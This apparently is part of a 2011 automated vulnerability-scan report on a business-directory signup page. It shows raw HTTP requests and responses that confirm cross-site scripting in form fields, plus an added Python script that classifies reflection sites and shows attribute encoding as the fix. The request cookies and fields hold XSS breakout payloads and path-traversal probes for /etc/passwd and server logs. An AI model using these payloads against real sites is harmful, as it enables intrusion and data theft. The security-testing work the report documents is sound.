type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="'"--></style></script><script>netsparker(0x001312)</script>" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailA..
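What makes these two findings "Confirmed" rather than merely "Identified" is visible in the response bodies above: the scanner's marker `netsparker(0x0012F8)` (and `0x001312` for pseudonym) comes back with its breakout prefix `'"--></style></script><script>` intact. The same refererUrl value is actually reflected three times in one page: twice into hidden `<input ... value="...">` fields without any encoding, and a third time entity-encoded as `&#039;&#034;--&gt;&lt;/style&gt;...`, so the application already has a correct attribute encoder and simply fails to apply it at two of the three sites. The script below, an added example that is not part of this report and not Netsparker's or InsideUp's code, reproduces that confirmation logic over a constructed, trimmed copy of the response, and shows the hardened rendering of the field. `hidden_input` is a hypothetical stand-in for whatever template code emitted the field; `SAMPLE_RESPONSE` is constructed from the three reflection sites on the page.

```python
import html
import re

# The scanner's marker survives HTML encoding, so it pinpoints every
# reflection site even where the breakout characters did not survive.
MARKER_RE = re.compile(r"netsparker\(0x[0-9A-Fa-f]+\)")

# Payload from the refererUrl request body above, URL-decoded.
PAYLOAD = "'\"--></style></script><script>netsparker(0x0012F8)</script>"


def breakout_prefix(payload):
    """The part of the payload up to and including the <script> that carries
    the marker; its byte-for-byte survival decides exploitability."""
    return payload[: payload.index("<script>") + len("<script>")]


def classify_reflections(body, payload):
    """Find each reflection of `payload` in `body` and classify it.

    Each result carries:
      offset          position of the marker in `body`
      executable      whole breakout prefix reached the page unencoded
      script_tag_raw  at least the literal <script> survived (enough to
                      execute if the sink is a text node rather than an
                      attribute)
      encoded         prefix is present only as HTML entities (neutralised)
    """
    marker = MARKER_RE.search(payload).group(0)
    prefix = breakout_prefix(payload)
    window = 8 * len(prefix)  # entity-encoded prefixes are much longer
    sites = []
    for m in re.finditer(re.escape(marker), body):
        before = body[max(0, m.start() - window): m.start()]
        executable = before.endswith(prefix)
        script_tag_raw = before.endswith("<script>")
        encoded = (not script_tag_raw
                   and html.unescape(before).endswith(prefix))
        sites.append({"offset": m.start(), "executable": executable,
                      "script_tag_raw": script_tag_raw, "encoded": encoded})
    return sites


def count_executable(body, payload):
    """Number of reflection sites a browser would actually execute."""
    return sum(1 for s in classify_reflections(body, payload)
               if s["executable"])


def hidden_input(name, value):
    """Hypothetical hardened rendering of the hidden field: attribute-encode
    the value (html.escape with quote=True also encodes ' and ")."""
    return '<input type="hidden" name="%s" value="%s"/>' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


# Constructed sample: a trimmed copy of the response above. The first two
# reflections mirror the unencoded hidden inputs in the login forms; the
# third mirrors the entity-encoded one in the signup form.
SAMPLE_RESPONSE = (
    '<form id="loginForm" method="post"> '
    '<input type="hidden" name="refererUrl" value="' + PAYLOAD + '"> '
    '<input name="username" type="text"/> </form> '
    '<form method="post" id="communityLoginId"> '
    '<input type="hidden" name="refererUrl" value="' + PAYLOAD + '"> </form> '
    '<form method="post" action="communitysignup.html"> '
    "<input type=\"hidden\" name=\"refererUrl\" value='"
    "&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;"
    "netsparker(0x0012F8)&lt;/script&gt;'/> </form>"
)


if __name__ == "__main__":
    for site in classify_reflections(SAMPLE_RESPONSE, PAYLOAD):
        print(site)
    print("executable sites:", count_executable(SAMPLE_RESPONSE, PAYLOAD))
    print("after fix:", count_executable(hidden_input("refererUrl", PAYLOAD),
                                         PAYLOAD))
```

Run against the real response bodies the `executable` flag is the scanner's "Confirmed" verdict; the `0x...` value in the marker ties each site back to the request that produced it, which matters here because every POST field on the form is reflected into the same three places. The `encoded` site shows that the fix is not a new library but applying the existing attribute encoding at every sink.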
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST '"--></style></script><script>alert(0x001323)</script>
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 237
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001323)%3c%2fscript%3e&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:39 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=9AB8ABEC9A2008FE5CE228DED8ABDAED; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="'"--></style></script><script>netsparker(0x00132..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST '"--></style></script><script>alert(0x001330)</script>
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 